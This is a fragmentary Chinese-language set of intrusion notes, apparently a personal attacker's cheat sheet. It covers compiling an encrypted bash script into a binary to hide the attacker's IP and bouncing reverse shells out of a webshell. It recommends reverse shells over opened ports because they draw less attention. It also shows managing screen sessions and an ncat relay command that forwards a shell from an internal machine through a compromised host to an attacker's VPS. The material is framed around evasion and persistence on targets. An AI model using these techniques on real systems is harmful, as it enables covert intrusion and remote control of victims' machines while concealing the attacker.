加密一下bash脚本,加密后会生成一个c源代码文件和编译之后的二进制文件,把编译之后的二进制文件传到目标机器上执行就行了,可以弥补一下目标机器在国内时不便于隐藏攻击ip的缺陷
本地执行:
..../reverse
webshell提供的shell环境限制很多,所以最好先反弹shell,尽量不要正向连接shell,开个端口动静太大
首先是不能弹shell的情况,比如相关的bash,nc等命令都被限制了...2.在screen的会话中时,快捷键ctrl+a,ctrl+d把当前screen放在后台
3.screen -r screen会话的名字恢复一个screen
4.在screen的会话中exit可以退出...目标机器如果不出网可以反弹到已经打下来的内网机器上,也可以再把反弹的端口转发到vps上,实现通过转发出网
通过ncat转发出网:
中转的机器执行:
ncat -l 中转机器接收内网反弹来的shell的端口...-c 'ncat 攻击机的ip 攻击机的端口'
这样攻击机就可以接收到不出网的设备弹的shell,唯一的缺点就是中转的机器要占用个端口
中不中转对于不出网的设备的权限维持都是一样的,主要的区别就是在vps